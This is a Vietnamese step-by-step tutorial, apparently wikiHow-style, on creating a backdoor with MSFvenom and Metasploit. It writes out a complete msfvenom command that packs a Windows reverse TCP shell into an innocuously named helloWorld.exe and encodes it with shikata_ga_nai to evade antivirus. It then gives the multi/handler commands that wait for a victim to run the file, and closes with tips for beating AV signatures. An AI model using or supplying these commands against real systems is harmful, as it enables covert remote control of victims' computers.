Một cửa hậu được sử dụng để vượt qua các cơ chế bảo mật, thường là bí mật và hầu như không thể phát hiện được. Sử dụng MSFvenom, sự kết hợp của msfpayload và msfencode, có thể tạo một cửa sau kết nối ngược lại với kẻ tấn công bằng cách sử dụng ngược lại TCP. Để phát triển backdoor, bạn cần thay đổi chữ ký của phần mềm độc hại để tránh bất kỳ phần mềm diệt vi rút nào. Hoàn thành dự án này trên một cặp máy tính mà bạn có quyền truy cập và trong quá trình này, bạn sẽ tìm hiểu thêm về bảo mật máy tính và cách hoạt động của loại cửa hậu này.
Các bước
Bước 1. Khởi động Kali và kích hoạt bảng điều khiển Terminal
Bước 2. Gõ ifconfig để hiển thị giao diện và kiểm tra địa chỉ IP của bạn
Bước 3. Gõ bộ mã hóa msfvenom -l để hiển thị danh sách bộ mã hóa
Bạn sẽ sử dụng x86 / shikata_ga_nai làm bộ mã hóa
Bước 4. Gõ "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 - cửa sổ định dạng chỉ định kiến trúc để sử dụng.
- -p windows / shell / reverse_tcp chỉ định các trọng tải để nhúng.
- LHOST chỉ định địa chỉ IP của người nghe.
- LPORT chỉ định cổng lắng nghe.
- -b "\ x00" chỉ định để tránh ký tự xấu (byte rỗng).
- -e x86 / shikata_ga_nai chỉ định tên bộ mã hóa.
- -f exe> helloWorld.exe chỉ định đầu ra định dạng.
Bước 5. Gõ msfconsole để kích hoạt Metasploit
Bây giờ bạn đã tạo backdoor của mình. Khi nạn nhân nhấp vào helloWorld.exe, tải trọng shell được nhúng sẽ được kích hoạt và tạo kết nối trở lại hệ thống của bạn. Để nhận được kết nối, bạn phải mở trình xử lý đa năng trong Metasploit và đặt trọng tải
Bước 6. Nhập sử dụng khai thác / đa / trình xử lý
Bước 7. Gõ set payload windows / shell / reverse_tcp
Bước 8. Nhập tùy chọn hiển thị để kiểm tra mô-đun
Bước 9. Gõ bộ LHOST 192.168.48.129
"LHOST" chỉ định địa chỉ IP của người nghe
Bước 10. Nhập set LPORT 4444
"LPORT" chỉ định cổng lắng nghe
Bước 11. Nhập run và đợi kết nối từ máy của nạn nhân
Bước 12. Chờ nạn nhân nhấp vào helloWorld.exe
Sau đó, bạn sẽ được kết nối thành công với máy của nạn nhân.
Lời khuyên
- Sử dụng -i trong MSFvenom sẽ đại diện cho các lần lặp lại mã hóa. Đôi khi, nhiều lần lặp lại có thể giúp tránh được phần mềm AV.
- Bạn đã học cách tạo backdoor và mã hóa bằng cách sử dụng MSFvenom, nhưng phương pháp này sẽ không hoạt động hoàn hảo so với một số phần mềm AV hiện nay. Lý do đằng sau điều này là do các mẫu thực thi trong MSFvenom. Các nhà cung cấp AV đã thêm chữ ký tĩnh của các mẫu này và chỉ cần tìm kiếm chúng. Giải pháp cho vấn đề này là sử dụng một mẫu thực thi khác hoặc các công cụ khác.